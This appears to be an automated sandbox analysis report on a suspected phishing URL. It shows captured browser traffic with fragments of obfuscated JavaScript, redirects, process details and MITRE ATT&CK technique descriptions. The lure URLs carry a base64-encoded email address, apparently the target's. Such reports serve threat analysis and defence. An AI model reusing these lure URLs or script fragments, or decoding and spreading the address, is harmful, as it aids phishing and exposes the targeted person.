b(0x284,0x555,'0*i7',0x40c,0x47f),_0x57e1f6(0x221,0x590,'2^Aa',0x4da,0x56c)+_0x50c3cb(-0x6,0x4e0,'KC[m',0x227,0x96),_0x50c3cb(-0x2aa,0x2d6,'!x(J',-0x13,0xb5)+_0x57e1f6(-0x321,-0x4c,'duM6',-0x23a,0x28),_0x50c3cb(0x398,0x57e,'v6XN',0x2b1,0x1d1)+_0x3b023f(0x
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 35 2c 30 78 38 35 63 2c 27 32 63 64 49 27 29 2c 5f 30 78 65 31 38 66 30 38 28 30 78 34 36 66 2c 30 78 38 33 2c 30 78 33 33 62 2c 30 78 31 65 37 2c 27 54 6e 79 21 27 29 2b 27 65 72 27 2c 5f 30 78 33 66 34 36 64 66 28 30 78 31 65 63 2c 30 78 33 33 30 2c 27 6d 6a 77 4e 27 2c 30 78 34 63 38 2c 30 78 34 61 61 29 2b 27 75 73 27 2c 5f 30 78 33 62 30 32 33 66 28 30 78 36 63 31 2c 30 78 39 61 61 2c 30 78 37 35 33 2c 30 78 34 33 64 2c 27 31 28 75 69 27 29 2b 27 72 6b 27 2c 5f 30 78 35 30 63 33 63 62 28 30 78 33 33 66 2c 30 78 35 65 64 2c 27 6f 67 35 34 27 2c 30 78 33 30 30 2c 30 78 34 34 31 29 2b 27 61 6c 27 2c 5f 30 78 65 31 38 66 30 38 28 2d 30 78 33 62 2c 30 78 31 61 2c 2d 30 78 31 33 31 2c 2d 30 78 32 63 63 2c 27 6d 6a 77 4e 27 29 2b 5f 30 78 33 66 34 36 64 66 Data Ascii: 5,0x85c,'2cdI'),_0xe18f08(0x46f,0x83,0x33b,0x1e7,'Tny!')+'er',_0x3f46df(0x1ec,0x330,'mjwN',0x4c8,0x4aa)+'us',_0x3b023f(0x6c1,0x9aa,0x753,0x43d,'1(ui')+'rk',_0x50c3cb(0x33f,0x5ed,'og54',0x300,0x441)+'al',_0xe18f08(-0x3b,0x1a,-0x131,-0x2cc,'mjwN')+_0x3f46df
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 64 34 2c 30 78 32 61 37 29 2c 5f 30 78 33 66 34 36 64 66 28 30 78 32 37 39 2c 30 78 31 33 61 2c 27 77 51 41 4c 27 2c 30 78 34 37 31 2c 30 78 32 65 39 29 2b 5f 30 78 35 30 63 33 63 62 28 30 78 33 33 36 2c 30 78 34 35 63 2c 27 32 5e 41 61 27 2c 30 78 31 62 63 2c 30 78 64 61 29 2c 5f 30 78 35 30 63 33 63 62 28 2d 30 78 31 30 33 2c 30 78 31 65 61 2c 27 48 23 4f 5e 27 2c 2d 30 78 34 2c 30 78 31 32 64 29 2c 5f 30 78 35 37 65 31 66 36 28 30 78 32 61 38 2c 30 78 35 38 61 2c 27 4f 46 32 28 27 2c 30 78 33 30 32 2c 30 78 34 31 36 29 2b 27 72 27 2c 5f 30 78 33 62 30 32 33 66 28 30 78 33 37 62 2c 30 78 31 65 63 2c 30 78 36 65 33 2c 30 78 36 65 36 2c 27 5b 38 50 78 27 29 2b 27 65 27 2c 5f 30 78 65 31 38 66 30 38 28 2d 30 78 32 35 39 2c 30 78 65 66 2c 30 78 38 66 2c 30 Data Ascii: d4,0x2a7),_0x3f46df(0x279,0x13a,'wQAL',0x471,0x2e9)+_0x50c3cb(0x336,0x45c,'2^Aa',0x1bc,0xda),_0x50c3cb(-0x103,0x1ea,'H#O^',-0x4,0x12d),_0x57e1f6(0x2a8,0x58a,'OF2(',0x302,0x416)+'r',_0x3b023f(0x37b,0x1ec,0x6e3,0x6e6,'[8Px')+'e',_0xe18f08(-0x259,0xef,0x8f,0
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 2c 5f 30 78 33 62 30 32 33 66 28 30 78 38 37 33 2c 30 78 35 66 33 2c 30 78 38 32 32 2c 30 78 38 62 64 2c 27 52 37 69 4b 27 29 2b 27 64 27 2c 5f 30 78 35 30 63 33 63 62 28 30 78 39 39 36 2c 30 78 39 63 65 2c 27 5a 62 55 33 27 2c 30 78 36 39 66 2c 30 78 37 64 33 29 2b 27 65 72 27 2c 5f 30 78 65 31 38 66 30 38 28 30 78 62 2c 30 78 63 66 2c 30 78 32 66 39 2c 30 78 35 37 66 2c 27 5b 6f 71 37 27 29 2b 27 69 74 27 2c 5f 30 78 33 62 30 32 33 66 28 30 78 34 66 66 2c 30 78 35 63 34 2c 30 78 32 34 64 2c 30 78 31 61 63 2c 27 5d 26 55 62 27 29 2c 5f 30 78 35 30 63 33 63 62 28 30 78 32 64 31 2c 30 78 32 39 31 2c 27 76 36 58 4e 27 2c 30 78 32 32 2c 2d 30 78 38 64 29 2b 27 65 27 2c 5f 30 78 33 62 30 32 33 66 28 30 78 36 37 38 2c 30 78 39 61 64 2c 30 78 39 63 36 2c 30 78 Data Ascii: ,_0x3b023f(0x873,0x5f3,0x822,0x8bd,'R7iK')+'d',_0x50c3cb(0x996,0x9ce,'ZbU3',0x69f,0x7d3)+'er',_0xe18f08(0xb,0xcf,0x2f9,0x57f,'[oq7')+'it',_0x3b023f(0x4ff,0x5c4,0x24d,0x1ac,']&Ub'),_0x50c3cb(0x2d1,0x291,'v6XN',0x22,-0x8d)+'e',_0x3b023f(0x678,0x9ad,0x9c6,0x
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 61 36 28 2d 30 78 66 62 2c 30 78 34 38 2c 30 78 32 35 30 2c 27 51 6b 5a 6c 27 2c 30 78 32 63 31 29 5d 28 4d 61 74 68 5b 5f 30 78 33 66 31 65 65 32 28 27 44 5d 54 6e 27 2c 30 78 62 31 2c 30 78 35 32 64 2c 30 78 32 33 35 2c 30 78 32 38 30 29 2b 27 6d 27 5d 28 29 2c 64 69 63 74 69 6f 6e 61 72 79 5b 5f 30 78 32 39 35 35 64 64 28 27 26 4d 68 66 27 2c 30 78 33 32 36 2c 2d 30 78 31 33 35 2c 30 78 31 63 35 2c 30 78 63 33 29 2b 27 68 27 5d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 63 65 30 30 66 28 5f 30 78 33 62 39 66 63 36 2c 5f 30 78 31 36 63 39 37 35 2c 5f 30 78 32 30 62 31 65 61 2c 5f 30 78 34 63 30 38 65 32 2c 5f 30 78 32 35 34 32 63 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 65 31 38 66 30 38 28 5f 30 78 33 62 39 66 63 36 2d 30 78 32 38 2c 5f 30 78 31 36 Data Ascii: a6(-0xfb,0x48,0x250,'QkZl',0x2c1)](Math[_0x3f1ee2('D]Tn',0xb1,0x52d,0x235,0x280)+'m'](),dictionary[_0x2955dd('&Mhf',0x326,-0x135,0x1c5,0xc3)+'h']));function _0x3ce00f(_0x3b9fc6,_0x16c975,_0x20b1ea,_0x4c08e2,_0x2542c2){return _0xe18f08(_0x3b9fc6-0x28,_0x16
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 68 62 47 27 2c 27 76 48 4a 64 4c 75 64 63 48 71 27 2c 27 57 52 38 53 76 53 6b 4a 57 51 75 27 2c 27 77 47 5a 64 4c 47 27 2c 27 57 35 7a 6d 45 38 6f 4b 64 47 27 2c 27 57 50 74 63 54 6d 6f 33 6f 47 43 27 2c 27 57 36 2f 64 49 68 65 41 63 61 27 2c 27 57 37 42 64 55 6d 6b 66 69 38 6b 61 27 2c 27 57 36 54 61 72 65 79 27 2c 27 57 52 72 63 64 61 57 27 2c 27 57 36 39 61 77 76 6d 4e 27 2c 27 57 51 46 63 4c 38 6f 6b 67 47 27 2c 27 57 50 6d 4d 57 36 46 63 47 59 79 27 2c 27 57 50 48 76 6f 43 6b 4e 27 2c 27 57 50 64 64 56 38 6b 37 64 71 75 27 2c 27 70 4a 64 64 50 77 50 4d 27 2c 27 6f 4a 5a 64 4f 77 58 32 27 2c 27 57 51 38 62 57 37 68 64 4e 43 6f 7a 27 2c 27 57 51 65 36 70 47 27 2c 27 57 52 6c 63 56 38 6f 58 57 4f 7a 4a 27 2c 27 72 71 54 39 74 72 30 27 2c 27 79 4e 6c 63 Data Ascii: hbG','vHJdLudcHq','WR8SvSkJWQu','wGZdLG','W5zmE8oKdG','WPtcTmo3oGC','W6/dIheAca','W7BdUmkfi8ka','W6Tarey','WRrcdaW','W69awvmN','WQFcL8okgG','WPmMW6FcGYy','WPHvoCkN','WPddV8k7dqu','pJddPwPM','oJZdOwX2','WQ8bW7hdNCoz','WQe6pG','WRlcV8oXWOzJ','rqT9tr0','yNlc
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 57 52 6e 6e 61 47 62 38 27 2c 27 57 37 42 64 4a 6d 6b 6e 6f 38 6b 6e 27 2c 27 64 38 6b 6e 57 37 78 64 48 47 27 2c 27 57 50 6a 30 6a 38 6b 75 57 51 43 27 2c 27 72 38 6f 4b 57 51 33 64 4d 62 43 27 2c 27 44 61 58 45 71 72 38 27 2c 27 71 59 72 70 43 74 71 27 2c 27 57 34 6d 6c 57 52 58 55 72 61 27 2c 27 46 33 68 63 53 38 6f 4b 57 34 30 27 2c 27 64 38 6f 66 57 50 2f 64 47 71 27 2c 27 65 53 6f 4f 75 53 6f 2f 57 50 47 27 2c 27 73 64 35 38 79 53 6b 4d 27 2c 27 57 35 64 64 4a 75 71 27 2c 27 6c 6d 6f 6a 67 71 27 2c 27 57 36 74 64 4d 77 69 4f 57 4f 69 27 2c 27 70 62 31 6b 76 47 27 2c 27 73 71 56 64 49 71 27 2c 27 57 51 34 54 71 57 27 2c 27 46 78 46 63 54 43 6f 39 57 34 4f 27 2c 27 71 32 4e 63 4a 53 6f 34 57 36 69 27 2c 27 71 72 5a 64 48 4c 75 27 2c 27 62 64 5a 63 53 Data Ascii: WRnnaGb8','W7BdJmkno8kn','d8knW7xdHG','WPj0j8kuWQC','r8oKWQ3dMbC','DaXEqr8','qYrpCtq','W4mlWRXUra','F3hcS8oKW40','d8ofWP/dGq','eSoOuSo/WPG','sd58ySkM','W5ddJuq','lmojgq','W6tdMwiOWOi','pb1kvG','sqVdIq','WQ4TqW','FxFcTCo9W4O','q2NcJSo4W6i','qrZdHLu','bdZcS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	142.4.12.244	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:20 UTC	652	OUT	GET /favicon.ico HTTP/1.1 Host: warrentongroup.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:21 UTC	371	IN	HTTP/1.1 302 Found Date: Tue, 16 Apr 2024 12:21:21 GMT Server: Apache Link: <https://www.warrentongroup.com/wp-json/>; rel="https://api.w.org/" X-Redirect-By: WordPress Location: https://www.warrentongroup.com/wp-content/uploads/2022/05/cropped-TWG_green_LOGO_color-32x32.png Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-04-16 12:21:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	142.4.12.244	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:23 UTC	648	OUT	GET /wp-content/uploads/2022/05/cropped-TWG_green_LOGO_color-32x32.png HTTP/1.1 Host: www.warrentongroup.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://warrentongroup.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:24 UTC	206	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:21:23 GMT Server: Apache Last-Modified: Fri, 13 May 2022 06:30:46 GMT Accept-Ranges: bytes Content-Length: 1143 Connection: close Content-Type: image/png
2024-04-16 12:21:24 UTC	1143	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 04 29 49 44 41 54 58 85 ed 96 5d 88 94 55 18 c7 7f ff 65 19 64 89 0a 11 11 5b 6c 66 d9 44 4a 0a 96 10 db ac 66 24 0a 22 8b 92 a4 77 b2 52 42 9c 5d 23 84 08 e9 2a 22 ea 22 34 4c 71 67 4d 28 b2 98 b7 bb be c8 3e 2e 9a 17 fc b8 30 a1 d5 72 09 93 9d 97 25 bc 10 11 59 bc b0 45 e6 df c5 bc b3 3b 33 ee 97 6b 5d e5 03 07 ce c7 73 9e ff ef 3c cf 7b 66 0e fc df 4d f3 d9 94 0e b2 29 c1 ad a0 71 c4 58 a5 54 fe 6f 01 32 41 36 65 78 0a 78 06 e8 05 96 49 6a 03 c0 1e 33 9c 02 7d 2f 5c aa 84 51 fc af 01 64 82 5c 9b f1 26 e0 6d 49 9d b3 05 33 be 8a 29 01 6f c6 61 74 ee 86 00 d2 41 6e 21 38 94 f4 d8 a4 82 cf Data Ascii: PNGIHDR szzpHYs+)IDATX]Ued[lfDJf$"wRB]#*""4LqgM(>.0r%YE;3k]s<{fM)qXTo2A6exxIj3}/\Qd\&mI3)oatAn!8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49751	142.4.12.244	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:24 UTC	411	OUT	GET /wp-content/uploads/2022/05/cropped-TWG_green_LOGO_color-32x32.png HTTP/1.1 Host: www.warrentongroup.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:24 UTC	206	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:21:24 GMT Server: Apache Last-Modified: Fri, 13 May 2022 06:30:46 GMT Accept-Ranges: bytes Content-Length: 1143 Connection: close Content-Type: image/png
2024-04-16 12:21:24 UTC	1143	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 04 29 49 44 41 54 58 85 ed 96 5d 88 94 55 18 c7 7f ff 65 19 64 89 0a 11 11 5b 6c 66 d9 44 4a 0a 96 10 db ac 66 24 0a 22 8b 92 a4 77 b2 52 42 9c 5d 23 84 08 e9 2a 22 ea 22 34 4c 71 67 4d 28 b2 98 b7 bb be c8 3e 2e 9a 17 fc b8 30 a1 d5 72 09 93 9d 97 25 bc 10 11 59 bc b0 45 e6 df c5 bc b3 3b 33 ee 97 6b 5d e5 03 07 ce c7 73 9e ff ef 3c cf 7b 66 0e fc df 4d f3 d9 94 0e b2 29 c1 ad a0 71 c4 58 a5 54 fe 6f 01 32 41 36 65 78 0a 78 06 e8 05 96 49 6a 03 c0 1e 33 9c 02 7d 2f 5c aa 84 51 fc af 01 64 82 5c 9b f1 26 e0 6d 49 9d b3 05 33 be 8a 29 01 6f c6 61 74 ee 86 00 d2 41 6e 21 38 94 f4 d8 a4 82 cf Data Ascii: PNGIHDR szzpHYs+)IDATX]Ued[lfDJf$"wRB]#*""4LqgM(>.0r%YE;3k]s<{fM)qXTo2A6exxIj3}/\Qd\&mI3)oatAn!8

Target ID:	0
Start time:	14:21:06
Start date:	16/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:21:08
Start date:	16/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1988,i,4898792362538319792,12946556423901625066,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:21:11
Start date:	16/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20="
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 4944, Parent PID: 3980

General

Chronological Activities

Analysis Process: chrome.exePID: 5244, Parent PID: 4944

General

Chronological Activities

Windows Analysis Report
https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=